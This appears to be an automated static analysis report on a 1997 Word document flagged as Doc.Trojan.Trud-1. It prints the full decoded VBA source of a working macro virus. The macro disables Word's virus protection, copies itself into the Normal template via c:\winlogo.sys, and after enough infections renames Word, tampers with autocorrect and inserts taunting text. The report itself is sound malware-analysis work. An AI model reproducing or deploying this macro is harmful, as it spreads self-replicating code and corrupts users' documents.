Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1c353ce051a9dcd1…

MALICIOUS

Office (OLE)

47.0 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 2f3fb3c038280d701e8805e8cec379be SHA-1: 264c61856aebb5b6d5e2a981f3ce5a51a9cce0a2 SHA-256: 1c353ce051a9dcd1dbabe222e3c4034706e69b7193221cfbc3e281870a50fab3
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros that are designed to export themselves to 'c:\winlogo.sys' and then import them into the Normal template, likely to establish persistence or download a second-stage payload. The ClamAV detection 'Doc.Trojan.Trud-1' strongly suggests malicious intent. The macro's obfuscated nature and truncated script prevent a more detailed analysis of its ultimate goal.

Heuristics 2

  • ClamAV: Doc.Trojan.Trud-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Trud-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2430 bytes
SHA-256: 93949b37362a34c29d9b056950cb0eecef19b07763a2b214836d26039b695c73
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error GoTo hometime
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
hohoho = 4
ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
If nt > 0 And ad > 0 Then GoTo hometime
If Dir("c:\winlogo.sys", vbSystem) = "" And nt = 0 Then
    Set host = NormalTemplate.VBProject.VBComponents.Item(1)
    ActiveDocument.VBProject.VBComponents.Item(1).Name = host.Name
    ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\winlogo.sys"
    SetAttr "c:\winlogo.sys", vbSystem
    host.codemodule.AddFromFile ("c:\winlogo.sys")
    host.codemodule.replaceline 5, "Private Sub Document_Close()"
Else
    plop = ActiveDocument.Saved
    plop2 = True
    Set host = ActiveDocument.VBProject.VBComponents.Item(1)
    host.codemodule.AddFromFile ("c:\winlogo.sys")
End If
For x = 1 To 4
    host.codemodule.deletelines 1
Next x
hohoho = hohoho + 1
NormalTemplate.VBProject.VBComponents.Item(1).codemodule.replaceline 6, "hohoho = " & hohoho
If hohoho >= 69 Then
    Application.Caption = "Microsoft Turd"
    AutoCorrect.ReplaceText = True
    AutoCorrect.Entries.Add Name:="the", Value:="hte"
    AutoCorrect.Entries.Add Name:="hte", Value:="the"
    Set bln = Assistant.NewBalloon
    With bln
        .Heading = "Isn't life just a bitch"
        .Text = "Choose an option."
        .Labels(1).Text = "Loose all your data."
        .Labels(2).Text = "Loose most of your data."
        .Labels(3).Text = "Loose just enough data to really fuck you off"
        .BalloonType = msoBalloonTypeButtons
        .Mode = msoModeModal
        .Show
    End With
    With ActiveDocument.Content
        .InsertParagraphBefore
        .InsertBefore "Don't Worry About a Thing !!!    I wouldn't fuck up your data !!!"
    End With
    With ActiveDocument.Paragraphs(1).Range.Font
        .ColorIndex = wdGreen
        .Size = 24
    End With
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
If plop2 Then ActiveDocument.Saved = plop
hometime:
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.